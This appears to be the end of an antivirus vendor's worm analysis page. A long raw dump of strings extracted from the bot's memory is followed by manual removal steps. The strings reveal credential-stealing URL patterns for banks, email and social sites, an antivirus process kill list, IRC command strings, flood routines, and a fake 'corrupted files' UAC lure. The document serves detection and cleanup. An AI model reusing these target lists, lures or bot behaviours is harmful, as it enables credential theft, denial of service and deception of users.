http="%d" total="%d"][ftp="%d" pop="%d" http="%d" total="%d"][RSOCK4]: Started rsock4 on "%s:%d"[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)[d="%s"] Error downloading file [e="%d"][d="%s"] Error writing download to "%S" [e="%d"][d="%s" s="%d bytes"] Error creating process "%S" [e="%d"][d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"][d="%s"] Error getting temporary filename. [e="%d"][d='%s"] Error getting application data path [e="%d"][Visit]: Error visitng "%s"[FTP Login]: %s[POP3 Login]: %s[FTP Infect]: %s was iframed[HTTP Login]: %s[HTTP Traffic]: %s[Ruskill]: Detected File: "%s"[Ruskill]: Detected DNS: "%s"[Ruskill]: Detected Reg: "%s"[PDef ]: %s[DNS]: Blocked DNS "%s"[MSN]: %s[HTTP]: %sftplogftpinfecthttploginhttptraffhttpspreadhttp://api.wipmania.com/\\.\pipe\x_ipc\\.\pipe\c1419a97%System%\spoolsv.exe%WinDir%%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe7 767<7~78*808;8~8%s\Identities\%s.exe\\.\pipeautorun.infpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exe.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exel"%s" %Slol.exen127.0.0.1%s:Zone.Identifierwininet.dllsecur32.dllws2_32.dll:%S%S\winlogon.exenotepad.exeAadvapi32.dllurlmon.dllnspr4.dllAkernel23.dlly%s\%s.exelsass.exeSoftware\Microsoft\Windows\CurrentVersion\Policies\System.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\Device\HarddiskVolume1\WINDOWS\system32\spoolsv.exeC:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exeExplorer.EXE_1912_rwx_021E0000_00027000:
.text`.rdata@.data.rsrc@.relocPSSSSSShPSSVSShRPVSShPSSh(PSSh#PSSh'PSSh&PSSh*9p.uVExplorer.EXE_1912_rwx_02208000_00072000:
Opera/9.00 (Windows NT 5.1; U; en)Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Mozilla/4.0 (compatible; MSIE 6.01; Windows NT 6.0)Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2)Opera 9.4 (Windows NT 6.1; U; en)Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; NeosBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 1.1.4322; Windows-Media-Player/10.00.00.3990; InfoPath.2Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726)SbieDll.dllSoftware\Classes\CLSID\%s\XSoftware\Classes\CLSID\%s\X\%s0xXSB:0xXG:%s_0xX_%c:%s_v1$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%uIEXPLORE.EXEIE.HTTPSOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoiceIE.HTTPSSOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoiceSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoiceSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoiceIE.AssocFile.HTMHTTP\shell\open\commandSoftware\Microsoft\Windows\CurrentVersion\Ext\Settings\%sPsapi.dll%s\%sSoftware\Adobe\Acrobat Reader\%s\Privilegedmscoree.dllHARDWARE\DESCRIPTION\System\CentralProcessor\%uSOFTWARE\Microsoft\Windows NT\CurrentVersionnspr4.dllnss3.dllUrlmon.dllURLDownloadToFileWNetapi32.dll76487-640-1457236-2383776487-337-8429955-2261476487-644-3177037-2351076497-640-6308873-2383555274-640-2673064-2395076487-640-8834005-2319576487-640-0716662-2353576487-644-8648466-2310600426-293-8170032-8514676487-341-5883812-22420SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ExplorerSOFTWARE\Microsoft\Windows\CurrentVersion\WindowsBackup{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}snxhk.dllcomctl32.dllZwSetValueKeyZwDeleteValueKeySOFTWARE\%supdate.microsoft.commicrosoft.comwindowsupdate.microsoft.comJOINPRIVMSG.rdatacmd_option.%s/c %scmd.exemsvcrt.dll--x-x-x-xxContent-Type: multipart/form-data; boundary=x-x-x-xxContent-Disposition: multipart/form-data; name="newfile"; filename="%d.jpeg"%s?action=up&g=%sxul.dllContent-Type: application/x-www-form-urlencodedHTTP/1.1?pid=%d?page=%d?id=%u%s=%u&%s=%s%s=%s&%s=%u&%s=%s&%s%u=&%s%hu=&%s=_%u%d|%s|%s|%s.infohttpgetGET /%s HTTP/1.1Host: %sContent-Length: %dAccept: %sAccept-Language: %sAccept-Charset: %sAccept-Encoding: %sUser-Agent: %sReferer: %sConnection: %shttp://iexplore.exefirefox.exetbb-firefox.exe%s:%huwindowsupdateSSH2_MSG_KEXINITSSH2_MSG_DISCONNECTSSH2_MSG_USERAUTH_SUCCESShttp://%s%s/image.php?id=%sTaskDialogIndirecthttp://answers.microsoft.com/en-us/windows/forum/windows_vista-windows_programs/corrupted-documents-folder/e2a7660f-8eea-4f27-b2e6-e77a0f0c1535ÐxXntdll.dllkernel32.dllsecur32.dllcrypt32.dlluser32.dlladvapi32.dllwininet.dllshell32.dllshlwapi.dllole32.dllversion.dllsfc.dlldnsapi.dllws2_32.dll8"808]9|99%9 919<9=(=/=6==={=4 4?4^4}46o6g6r6w69 9$9(90949.text`.rdata@.data.rsrcThis pointer, %d, is aligned on %dThis pointer, %d, is not aligned on %d%f, %f and %f form a right-angled triangle.Invalid parameter passed to C runtime function.?#%X.y%S#[kPlease contact the application's support team for more information.- Attempt to initialize the CRT more than once.- CRT not initialized- floating point support not loadedGetProcessWindowStationUSER32.DLLShellExecuteASHELL32.dllGetCPInfoGetWindowsDirectoryACreatePipeGetWindowsDirectoryWGetConsoleOutputCPKERNEL32.dll.VI3xqrzcÁUdp?iw0/#"%fP.oUwB%Su[Rkka.by.dYi'p.Cvq.EU{%D ;0.Bx%s)$Oi.zC:*@7WeBld0%Fr. -.kN.kal"f.xKKSoftware\Classes\CLSID\%SG:%S_0xXchrome.exeopera.exesafari.exemaxthon.exe:Mozilla\Firefox\Profilescookies.sqlite%s\winsxs\x86_microsoft.windows.common-controls_*6.0.*_*%s\winsxs\%s\comctl32.dllSYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\%s%s:*:Enabledavcuf32.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Runprstrui.exeWindows DefenderMpClient.dllWindows Defender\MSASCui.exeMpSvc.dllmsseces.exeMsMpEng.exeMSASCui.exeMpAsDesc.dllMsMpLics.dllavgui.exeavgidsagent.exeavgwdsvc.exeavgdiagex.exeavgmfapx.exeavgupd.exeavgcfgex.exeavgnt.exeavguard.exeavshadow.exeavcenter.exeupdate.dllupdaterc.dllusrreq.execcsvchst.exesymerr.exeNIS.exeNAV.exenavw32.exeavastui.exeAvastEmUpdate.exeashUpd.exeWRSA.exezatray.exeForceField.exeupdating.dllfshoster32.exefsaua.dllPSUNMain.exePSUAService.exePSANHost.exePSUNScan.dllepavjobs.exeAVENGINE.exeUpgrader.exeadaware.exeBullGuard.exe.manifestBullGuardUpdate.exeBullGuard.exeBullGuardScanner.exeBullGuardBhvScanner.exeBullGuardUpdate2.exeBgScan.exeBgScanEngine.dll.manifestupdater.exeBackup\RSD\RSSetup\updater.exeRsTray.exeRavMonD.exeRsMgrSvc.exersmain.exeRsScan.dllRsTray.dllmbamgui.exembam.exepctsGui.exepctsAuxs.exepctsSvc.exeUpdate.exeUpdateHlpr.dllDefinitions\vcore.dllsbamui.exeSBAMTray.exeupdater_client_mod.dllFProtTray.exeFPWin.exescf.datALUpdate.exeupdate_tmp.exearcaclean.exeBavUpdater.exercfp.exeCLPSLA.exeop_mon.exeniu.exeK7TSUpdT.exesguardxup.execcupdate.execaupdate.dlla2guard.exea2start.exea2service.exeAVKTray.exeGDSC.exeAVK.exeGDFirewallTray.exeBka.exeBLuPro.exeBkavSystemServer.exeBkavService.exeLiveUpdate.dllLiveConnect.dllBaseFile\Bkav\LiveUpdate.dllV3Lite.exeASDSvc.exeautoup.exedownloader.exe%s.configupdatesrv.exeupdatemgr.dllegui.exeekrn.exex86\ekrn.exeuWinMgr.execoreServiceShell.exeuiSeAgnt.exeuiWatchDog.exeplugins\plugUpdater.dllUiFrmwrk\uiUpdateTray.execoreFrameworkHost.exemcagent.exeMcSvHost.exeMcUICnt.exeMcPvTray.exemcui_exemcpltui_exemcshell.exemcupdmgr.exemcupdate.exemcshield.exemcupdui.dllMcAPExe.exe.configImage File Execution Options\%sSYSTEM\CurrentControlSet\services\%s%c:\ntusbdriver.sys%c:\*p.exe%c:\%sp.exe%WinDir%\explorer.exe/C start /d. %s&"%s"%COMSPEC%%WinDir%\system32\shell32.dll%c:\%s.lnkVisthAux.exeexplorer.exet.minecraftWorks! PID: %d, Name: %scmdvirth%s%s\Xtcp://svchost.execsrss.exelsass.exesmss.exewscript.execscript.exevbc.exerundll32.exeregsvr32.exeSOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Runwinlogon.exeservices.exe%s\x.lnkSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%sdesktop.iniSOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceSOFTWARE\Microsoft\Windows NT\CurrentVersion\Windowswintrust.dllchrome.dllApplications\iexplore.exe\shell\open\command%s_xxx.zipNavw32.exeSysInspector.exeavscan.exemfefire.exewuauclt.exeWerFault.exelFileZilla\sitemanager.xmlportSites.datQuick.dat%s\3\%s%s\4\%sspoolsv.exesteam.exeskype.exeorigin.exedwm.exetapi3.dll/C copy "%s" "%s"SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunWindows Update Service"%s" /%sSoftware\Microsoft\Windows\CurrentVersion\RunOnce/CREATE /SC ONLOGON /TN "Windows Update Check - 0xX" /TR "%s" /RL HIGHESTschtasks.exe/DELETE /TN "Windows Update Check - 0xX" /F\Windows\Explorer.exeLow_X%s.manifestPendingFileRenameOperations%s\XWindows\CurrentVersion\RunCurrentVersion\WindowsWindows NT\CurrentVersion\Image File Execution Options\%sWindows has encountered a corrupted folder on your hard driveMultiple corrupted files have been found in the folder 'My Documents'. To prevent serious loss of data, please allow Windows to restore these files.Corrupted folder: %sCorrupted file count: %d%s/c start "" "%s" /%s "%s"shell32,ShellExec_RunDLL "%s" /%s "%s"You denied the proper privileges to the Windows file restoration utility. Please select YES on the following UAC prompt to allow Windows to restore the corrupted files.Windows 3.1 Update Service%s:Zone.Identifier%s\X.pifKERNEL32.DLLKERNELBASE.DLLkernelbase.dlloSome operation could not be performed because the system is out of resources. Close some windows and try again.Setting bit transparency color is not allowed for png images containing alpha value for each pixel (COLOR_RGBALPHA and COLOR_GRAYSCALEALPHA)OThis operation is not valid because the current image contains no valid header.4The new size provided for image resizing is invalid.oThe "Portable Network Graphics" could not be created because invalid image type parameters have being provided.2Software\Microsoft\Windows\CurrentVersion\ExplorerUThis "Portable Network Graphics" image is invalid because it has missing image parts.[Could not decompress the image because it contains invalid compressed data.Description: BThe "Portable Network Graphics" image contains an invalid palette.The file being read is not a valid "Portable Network Graphics" image because it contains an invalid header. This file may be corrupted, try obtaining it againnThis "Portable Network Graphics" image is not supported or it might be invalid.This "Portable Network Graphics" image is not supported because either its width or height exceeds the maximum size of 65535 pixels.There is no such palette entry.dThis "Portable Network Graphics" image contains an unknown critical part which could not be decoded.pThis "Portable Network Graphics" image is encoded with an unknown compression scheme which could not be decoded.cThis "Portable Network Graphics" image uses an unknown interlace scheme which could not be decoded.-The chunks must be compatible to be assigned.jThis "Portable Network Graphics" image is invalid because the decoder found an unexpected end of the file.8This "Portable Network Graphics" image contains no data.]The program tried to add a existent critical chunk to the current image which is not allowed.IIt's not allowed to add a new chunk because the current image is invalid.7The png image could not be loaded from the resource ID.)Class '%s' is already registered for '%s'%Class '%s' is not registered for '%s'%s parameter cannot be nil#Feature not supported by this styleStyle '%s' is not registered"Cannot unregister the system styleOLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parametersFailed to Save StreamjThis "Portable Network Graphics" image is not valid because it contains invalid pieces of data (crc error)yThe "Portable Network Graphics" image could not be loaded because one of its main piece of data (ihdr) might be corruptedLogin"%s" is an invalid pathÊnnot remove shell notification icon"%s requires Windows Vista or laterButton%dRadioButton%dUnable to load style '%s'Unable to load styles: %sStyle '%s' already registered#Style class '%s' already registeredStyle '%s' not foundStyle class '%s' not foundAll Clipboard does not support IconsCannot open clipboard: %sText exceeds memo capacity Operation not supported on selected printer.There is no default printer currently selected/Menu '%s' is already being used by another form- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.7Length of value array must be >= length of prompt array&PasswordValue must be between %d and %d%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex5Cannot create form. No MDI forms are currently active0Can only modify an image if it contains a bitmap*A control cannot have itself as its parentError creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'%s property out of rangeGNo single cast observer with ID %d was added to the observer collectionFNo multi cast observer with ID %d was added to the observer collectionScan line index out of range!Cannot change the size of an iconÊnnot change the size of a WIC Image$Unknown picture file extension (.%s)Unsupported clipboard formatCanvas does not allow drawing#Text format flag '%s' not supportedWindows Server 2003Windows Server 2003 R2Windows Server 2012Windows 8Error writing zip file"Invalid Zip Local Header signature$Invalid Zip Central Header signature1Support for compression method not registered: %sObserver is not supportedLCannot have multiple single cast observers added to the observers collection4The object does not implement the observer interface5Insufficient RTTI available to support this operationParameter count mismatch WindowsWindows VistaWindows Server 2008Windows 7Windows Server 2008 R2Windows 2000Windows XPTimespan too longbThe duration cannot be returned because the absolute value exceeds the value of TTimeSpan.MaxValueNo help found for context %dNo help found for %sParameter %s cannot be nil'Parameter %s cannot be a negative value*Input buffer exceeded for %s = %d, %s = %dThe specified path is too long The specified path was not found The path format is not supportedThe drive cannot be found The specified file was not foundWThe given "%s" local time is invalid (situated within the missing period prior to DST).$No help viewer that supports filtersInvalid Timeout value: %sFailed to create key %sFailed to get data for '%s'Failed to set data for '%s'Resource %s not found%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration groupProperty %s does not existThread creation error: %sThread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread2Cannot call Start on a running or suspended thread;Cannot call CheckTerminated on an externally created threadUnable to write to %sInvalid file name - %s'%s' is an invalid mask at (%d)$''%s'' is not a valid component nameInvalid data type for '%s' List capacity out of bounds (%d)List count out of bounds (%d)List index out of bounds (%d) Out of memory while expanding memory stream)%s has not been registered as a COM classError reading %s%s%s: %sInvalid count (%d)Invalid destination index (%d)Ancestor for '%s' not foundCannot assign a %s to a %sBits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main threadClass %s not foundA class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicatesCannot create file "%s". %sCannot open file "%s". %sInvalid destination array"Character index out of bounds (%d)Start index out of bounds (%d)%s (%s, line %d)Abstract Error?Access violation at address %p in module '%s'. %s of address %pSystem Error. Code: %d.2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)Operation not supportedExternal exception %xInterface not supportedObject lock not owned(Monitor support function not initializedApplication Error1Format '%s' invalid or incompatible with argumentNo argument for format '%s'"Variant method calls not supportedInvalid variant operationInvalid NULL variant operation%Invalid variant operation (%s%.8x)%s,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usableInteger overflow Invalid floating point operationInvalid pointer operationInvalid class typecast0Access violation at address %p. %s of address %pPrivileged instruction(Exception %s in module %s at %p.!'%s' is not a valid integer value('%s' is not a valid floating point value '%s' is not a valid date'%s' is not a valid time!'%s' is not a valid date and time '%d.%d' is not a valid timestamp'%s' is not a valid GUID valueI/O error %dExplorer.EXE_1912_rwx_02500000_0004E000:
.text`.rdata@.data.reloc=MSG t>MSG u`=PASS8httpu18httpuMtlSSSSSSSSSShL0Q%s.%s%s.%S%s.Blocked "%s" from removing our bot file!%s.Blocked "%S" from removing our bot file!i.root-servers.org%s.Blocked "%s" from moving our bot file%s.Blocked "%S" from moving our bot file%s.p10-> Message hijacked!%s.p10-> Message to %s hijacked!%s.p21-> Message hijacked!msnmsgCAL %d %6sngr->blocksize: %dblock_size: %d\\.\pipe\%skernel32.dll%s_%d-%sMutexntdll.dll%s-pid%s-commJOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %5sJOIN %5sPRIVMSGJOIN%s:%d%s.%s%s%S%s%s%s.%S%S%S%S%Sstate_%s%s.%s (p='%S')pop3://%s:%s@%s:%d%s:%s@%s:%dftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %s%s-%s-%s%s.Blocked possible browser exploit pack call on URL '%s'%s.Blocked possible browser exploit pack call on URL '%S'webroot.virusbuster.nprotect.heck.tconecare.live.login[password]login[username]*members*.iknowthatgirl*/members**youporn.*/login**members.brazzers.com**bcointernacional*login**:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*loginid*enom.com/login*login.Passlogin.User*login.Pass=**1and1.com/xml/config**moniker.com/*Login*LoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*loginname*godaddy.com/login*Password*Password=**alertpay.com/login**netflix.com/*ogin**thepiratebay.org/login**torrentleech.org/*login**vip-file.com/*/signin-do**sms4file.com/*/signin-do**letitbit.net**what.cd/login**oron.com/login**filesonic.com/*login**speedyshare.com/login**uploaded.to/*login**uploading.com/*login*loginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login**hotfile.com/login**4shared.com/login*txtpass*txtpass=**netload.in/index**freakshare.com/login*login_pass*login_pass=**mediafire.com/*login**sendspace.com/login**megaupload.*/*login**depositfiles.*/*/login**signin.ebay*SignIn*officebanking.cl/*login.asp**secure.logmein.*/*logincheck*session[password]*password]=**twitter.com/sessionstxtPassword*&txtPassword=**.moneybookers.*/*login.pl*runescape*/*weblogin**&password=**no-ip*/login**steampowered*/login*quick_password*hackforums.*/member.php*facebook.*/login.php**login.yahoo.*/*login*passwdlogin*passwd=**login.live.*/*post.srf*TextfieldPassword*TextfieldPassword=**gmx.*/*FormLogin**Passwd=*FLN-Password*FLN-Password=**pass=**bigstring.*/*index.php**screenname.aol.*/login.psp*passwordloginId*password=**aol.*/*login.psp*Passwd*google.*/*ServiceLoginAuth*login_passwordlogin_email*login_password=**paypal.*/webscr?cmd=_login-submit*%s / ?%d HTTP/1.1Host: %sUser-Agent: %sMozilla/4.0\\.\PHYSICALDRIVE0shell32.dllhttpidnsapi.dllhttp://%s/%shttp://%s/POST /23s[%s{%s%s{%sn%s[%s{%s%s{%s%s[%s{%s[DNS]: Redirecting "%s" to "%s"%s|%s[Logins]: Cleared %d loginsFTP ->[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)http://[Login]: %s[DNS]: Blocked %d domain(s) - Redirected %d domain(s)[Speed]: Estimated upload speed %d KB/sSoftware\Microsoft\Windows\CurrentVersion\Run\\.\%c:*bebo.*/c/profile/comment_post.json*bebo.*/mail/MailCompose.jsp**friendster.*/sendmessage.php**friendster.*/rpc.php*vkontakte.ru/mail.php*vkontakte.ru/wall.php*vkontakte.ru/api.php*facebook.*/ajax/*MessageComposerEndpoint.php*msg_text*facebook.*/ajax/chat/send.php*-_.!~*'()%s.%s hijacked!MSG %d %s %dMSG %d %1sSDG %d %dContent-Length: %dSDG %d%s_0xXRegCreateKeyExWRegCreateKeyExAURLDownloadToFileWURLDownloadToFileAHttpSendRequestWHttpSendRequestANtEnumerateValueKeyDNSAPI.dllSecur32.dllShellExecuteASHELL32.dllHttpQueryInfoAInternetOpenUrlAHttpQueryInfoWWININET.dllSHLWAPI.dllWS2_32.dllMSVCRT.dllGetProcessHeapConnectNamedPipeCreateNamedPipeADisconnectNamedPipeGetWindowsDirectoryWGetWindowsDirectoryAKERNEL32.dllUSER32.dllRegCloseKeyRegNotifyChangeKeyValueRegOpenKeyExAADVAPI32.dllole32.dllm1xg.orgmxxtxxt.bizmeob.me]1.1.0.0msn.setmsn.inthttp.sethttp.inthttp.injloginsPASS %s[.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E}SSRR %s 0 0 :%sKCIK %sSEND %s %sPART %sPPPPMSG %s :%sQUIT :%sPPNG %sPPPPMSG[v="%s" c="%s" h="%s" p="%S"][d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d[Slowloris]: Starting flood on "%s" for %d minute(s)[Slowloris]: Finished flood on "%s"[UDP]: Starting flood on "%s:%d" for %d second(s)[UDP]: Finished flood on "%s:%d"[SYN]: Starting flood on "%s:%d" for %d second(s)[SYN]: Finished flood on "%s:%d"[USB]: Infected %s[MSN]: Updated MSN spread message to "%s"[MSN]: Updated MSN spread interval to "%s"[HTTP]: Updated HTTP spread message to "%s"[HTTP]: Injected value is now %s.[HTTP]: Updated HTTP spread interval to "%s"[Visit]: Visited "%s"[DNS]: Blocked "%s"[usb="%d" msn="%d" http="%d" total="%d"][ftp="%d" pop="%d" http="%d" total="%d"][RSOCK4]: Started rsock4 on "%s:%d"[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)[d="%s"] Error downloading file [e="%d"][d="%s"] Error writing download to "%S" [e="%d"][d="%s" s="%d bytes"] Error creating process "%S" [e="%d"][d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"][d="%s"] Error getting temporary filename. [e="%d"][d='%s"] Error getting application data path [e="%d"][Visit]: Error visitng "%s"[FTP Login]: %s[POP3 Login]: %s[FTP Infect]: %s was iframed[HTTP Login]: %s[HTTP Traffic]: %s[Ruskill]: Detected File: "%s"[Ruskill]: Detected DNS: "%s"[Ruskill]: Detected Reg: "%s"[PDef ]: %s[DNS]: Blocked DNS "%s"[MSN]: %s[HTTP]: %sftplogftpinfecthttploginhttptraffhttpspreadhttp://api.wipmania.com/\\.\pipe\x_ipc\\.\pipe\c1419a97%WinDir%\Explorer.EXE%WinDir%%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe7 767<7~78*808;8~8%s\Identities\%s.exe\\.\pipeautorun.infpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exe.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exel"%s" %Slol.exen127.0.0.1%s:Zone.Identifierwininet.dllsecur32.dllws2_32.dll:%S%S\winlogon.exenotepad.exeAadvapi32.dllurlmon.dllnspr4.dllAkernel23.dlly%s\%s.exelsass.exeSoftware\Microsoft\Windows\CurrentVersion\Policies\System.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\Device\HarddiskVolume1\WINDOWS\explorer.exeC:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
ngggg.exe:1096
ngggg.exe:1596
ngggg.exe:912
calc.exe:3372
zthzjntzphj.exe:3036
%original file name%.exe:1984
dqqq.exe:180
vuxrwahifpa.exe:3788
vuxrwahifpa.exe:3272
vuxrwahifpa.exe:2984
bpihytyvgix.exe:2996
sppp.exe:3284
sppp.exe:2528
bett.exe:1580
bett.exe:1672 - Delete the original Worm file.
- Delete or disinfect the following files created/modified by the Worm:
%Documents and Settings%\%current user%\Application Data\c731200 (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\c731200 (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ngggg.exe (9505 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bett.exe (62128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\dq[1].exe (21775 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dqqq.exe (12735 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\spm[1].exe (43891 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ng[1].exe (33073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\bet[1].exe (70237 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sppp.exe (33910 bytes)
%Documents and Settings%\%current user%\My Documents\My Videos\Desktop.ini (312 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Uukmkg" = "%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicrosoftPerfWD" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\sppp.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.